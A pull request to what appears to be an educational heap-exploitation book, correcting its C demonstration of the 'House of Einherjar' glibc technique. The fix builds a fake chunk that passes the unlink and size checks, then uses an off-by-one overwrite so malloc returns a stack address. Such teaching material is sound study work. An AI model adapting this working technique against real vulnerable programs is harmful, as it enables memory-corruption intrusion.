### PR TITLE
Corrected not working einherjar example

### DIFF
--- a/assets/files/house_of_einherjar.c
+++ b/assets/files/house_of_einherjar.c
@@ -8,41 +8,45 @@ struct chunk_structure {
   size_t size;
   struct chunk_structure *fd;
   struct chunk_structure *bk;
-  char buf[32];               // padding
+  char buf[sizeof(size_t)*2]; // padding
 };
 
+
 int main() {
-  struct chunk_structure *chunk1, fake_chunk;
+  struct chunk_structure *chunk1;
   size_t allotedSize;
-  unsigned long long *ptr1, *ptr2;
+  unsigned long long *ptr1, *ptr2, *ptr3;
   char *ptr;
   void *victim;
-
-  printf("%p\n", &fake_chunk);
-
+  
   // Allocate any chunk
   ptr1 = malloc(40);
-  printf("%p\n", ptr1);
-
   // Allocate another chunk
   ptr2 = malloc(0xf8);
-  printf("%p\n", ptr2);
-
+  
+  printf("ptr1: %p\n", ptr1);
+  printf("ptr2: %p\n", ptr2);
+  
   chunk1 = (struct chunk_structure *)(ptr1 - 2);
   allotedSize = chunk1->size & ~(0x1 | 0x2 | 0x4);
   allotedSize -= sizeof(size_t);      // Heap meta data for 'prev_size' of chunk1
+
+  // Fake chunk with size = prev_size = 0 to prevent 'corrupted size vs. prev_size'
+  struct chunk_structure fake_chunk;
+  fake_chunk.prev_size = 0;
+  fake_chunk.size = 0;
+
+  // These two will ensure that unlink security checks pass
+  // i.e. P->fd->bk == P and P->bk->fd == P
+  fake_chunk.fd = &fake_chunk;
+  fake_chunk.bk = &fake_chunk;
+
+  printf("fake_chunk: %p\n", &fake_chunk);
 
   // Attacker initiates a heap overflow
   // Off by one overflow of ptr1, overflows into ptr2's 'size'
   ptr = (char *)ptr1;
   ptr[allotedSize] = 0;      // Zeroes out the PREV_IN_USE bit
-
-  // Fake chunk
-  fake_chunk.size = 0x100;    // enough size to service the malloc request
-  // These two will ensure that unlink security checks pass
-  // i.e. P->fd->bk == P and P->bk->fd == P
-  fake_chunk.fd = &fake_chunk;
-  fake_chunk.bk = &fake_chunk;
 
   // Overwrite ptr2's prev_size so that ptr2's chunk - prev_size points to our fake chunk
   // This falls within the bounds of ptr1's chunk - no need to overflow
@@ -54,7 +58,9 @@ int main() {
   // to merge with it. Now, top chunk will point to fake_chunk
   free(ptr2);
 
-  victim = malloc(40);
+  fake_chunk.size = 0x100; //set a suitable size
+  
+  victim = malloc(0xf8); //victim = fake_chunk + sizeof(size_t)*2
 
   printf("%p\n", victim);
 


### PR DESCRIPTION
Your example not works due to the security checks of free
`*** Error in './house_of_einherjar': corrupted size vs. prev_size: 0x[[fake_chunk address]]  ***`
fake_chunk.prev_size and fake_chunk.size must be 0 before free(ptr2). Try it.

I have not changed the markdown file of the book, you should update it. 
Thanks for the work you did with this book it is very useful :)